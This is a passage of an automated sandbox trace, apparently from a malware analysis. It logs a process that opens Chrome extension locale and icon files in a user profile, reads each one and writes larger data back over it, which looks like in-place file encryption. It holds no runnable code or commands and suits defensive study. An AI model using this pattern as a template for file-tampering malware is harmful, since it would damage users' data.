lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x628, lpOverlapped=0x0) returned 1 [0177.477] CloseHandle (hObject=0x1cc) returned 1 [0177.477] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.477] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.477] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe0 [0177.478] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.478] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.478] ReleaseMutex (hMutex=0x168) returned 1 [0177.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f733cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.478] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c4b98, nNumberOfBytesToRead=0xe0, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4b98*, lpNumberOfBytesRead=0x2e9f2bc*=0xe0, lpOverlapped=0x0) returned 1 [0177.479] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.479] WriteFile (in: hFile=0x1cc, lpBuffer=0x2846ab8*, nNumberOfBytesToWrite=0x668, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2846ab8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x668, lpOverlapped=0x0) returned 1 [0177.479] CloseHandle (hObject=0x1cc) returned 1 [0177.480] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.480] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.480] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xd9 [0177.480] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.480] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.480] ReleaseMutex (hMutex=0x168) returned 1 [0177.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.481] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c4b98, nNumberOfBytesToRead=0xd9, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4b98*, lpNumberOfBytesRead=0x2e9f2bc*=0xd9, lpOverlapped=0x0) returned 1 [0177.482] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.482] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x661, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x661, lpOverlapped=0x0) returned 1 [0177.482] CloseHandle (hObject=0x1cc) returned 1 [0177.482] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.483] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.483] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xec [0177.483] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.483] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.483] ReleaseMutex (hMutex=0x168) returned 1 [0177.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f733cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.483] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea4ca8, nNumberOfBytesToRead=0xec, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ca8*, lpNumberOfBytesRead=0x2e9f2bc*=0xec, lpOverlapped=0x0) returned 1 [0177.484] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.484] WriteFile (in: hFile=0x1cc, lpBuffer=0x2846ab8*, nNumberOfBytesToWrite=0x674, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2846ab8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x674, lpOverlapped=0x0) returned 1 [0177.485] CloseHandle (hObject=0x1cc) returned 1 [0177.485] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.486] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.486] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xde [0177.486] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.486] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.486] ReleaseMutex (hMutex=0x168) returned 1 [0177.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.486] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c4b98, nNumberOfBytesToRead=0xde, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4b98*, lpNumberOfBytesRead=0x2e9f2bc*=0xde, lpOverlapped=0x0) returned 1 [0177.487] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.487] WriteFile (in: hFile=0x1cc, lpBuffer=0x2846ab8*, nNumberOfBytesToWrite=0x666, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2846ab8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x666, lpOverlapped=0x0) returned 1 [0177.487] CloseHandle (hObject=0x1cc) returned 1 [0177.488] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.488] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.488] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x104 [0177.488] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.488] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.488] ReleaseMutex (hMutex=0x168) returned 1 [0177.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f733cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.489] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eea868, nNumberOfBytesToRead=0x104, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea868*, lpNumberOfBytesRead=0x2e9f2bc*=0x104, lpOverlapped=0x0) returned 1 [0177.490] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.490] WriteFile (in: hFile=0x1cc, lpBuffer=0x2846ab8*, nNumberOfBytesToWrite=0x68c, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2846ab8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x68c, lpOverlapped=0x0) returned 1 [0177.490] CloseHandle (hObject=0x1cc) returned 1 [0177.490] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.490] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.490] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xc8d [0177.491] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.491] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.491] ReleaseMutex (hMutex=0x168) returned 1 [0177.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icon_128.png", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icon_128.png", cchWideChar=12, lpMultiByteStr=0x1f7344c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icon_128.png", lpUsedDefaultChar=0x0) returned 12 [0177.491] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0xc8d, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f2bc*=0xc8d, lpOverlapped=0x0) returned 1 [0177.494] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.494] WriteFile (in: hFile=0x1cc, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1215, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1215, lpOverlapped=0x0) returned 1 [0177.495] CloseHandle (hObject=0x1cc) returned 1 [0177.495] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.496] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.496] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xde [0177.496] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.496] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.496] ReleaseMutex (hMutex=0x168) returned 1 [0177.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.496] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c4b98, nNumberOfBytesToRead=0xde, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4b98*, lpNumberOfBytesRead=0x2e9f2bc*=0xde, lpOverlapped=0x0) returned 1 [0177.498] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.498] WriteFile (in: hFile=0x1cc, lpBuffer=0x2883c38*, nNumberOfBytesToWrite=0x666, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2883c38*, lpNumberOfBytesWritten=0x2e9f2d0*=0x666, lpOverlapped=0x0) returned 1 [0177.498] CloseHandle (hObject=0x1cc) returned 1 [0177.499] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.500] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.500] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xd8 [0177.500] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.500] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.501] ReleaseMutex (hMutex=0x168) returned 1 [0177.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.501] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c4b98, nNumberOfBytesToRead=0xd8, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4b98*, lpNumberOfBytesRead=0x2e9f2bc*=0xd8, lpOverlapped=0x0) returned 1 [0177.502] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.502] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x660, lpOverlapped=0x0) returned 1 [0177.502] CloseHandle (hObject=0x1cc) returned 1 [0177.502] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.503] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.503] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xd5 [0177.503] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.503] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.503] ReleaseMutex (hMutex=0x168) returned 1 [0177.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.503] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c4b98, nNumberOfBytesToRead=0xd5, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4b98*, lpNumberOfBytesRead=0x2e9f2bc*=0xd5, lpOverlapped=0x0) returned 1 [0177.504] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.504] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x65d, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x65d, lpOverlapped=0x0) returned 1 [0177.504] CloseHandle (hObject=0x1cc) returned 1 [0177.504] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.505] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.505] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xd5 [0177.505] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.505] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.505] ReleaseMutex (hMutex=0x168) returned 1 [0177.505] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.505] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.505] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c4b98, nNumberOfBytesToRead=0xd5, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4b98*, lpNumberOfBytesRead=0x2e9f2bc*=0xd5, lpOverlapped=0x0) returned 1 [0177.506] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.506] 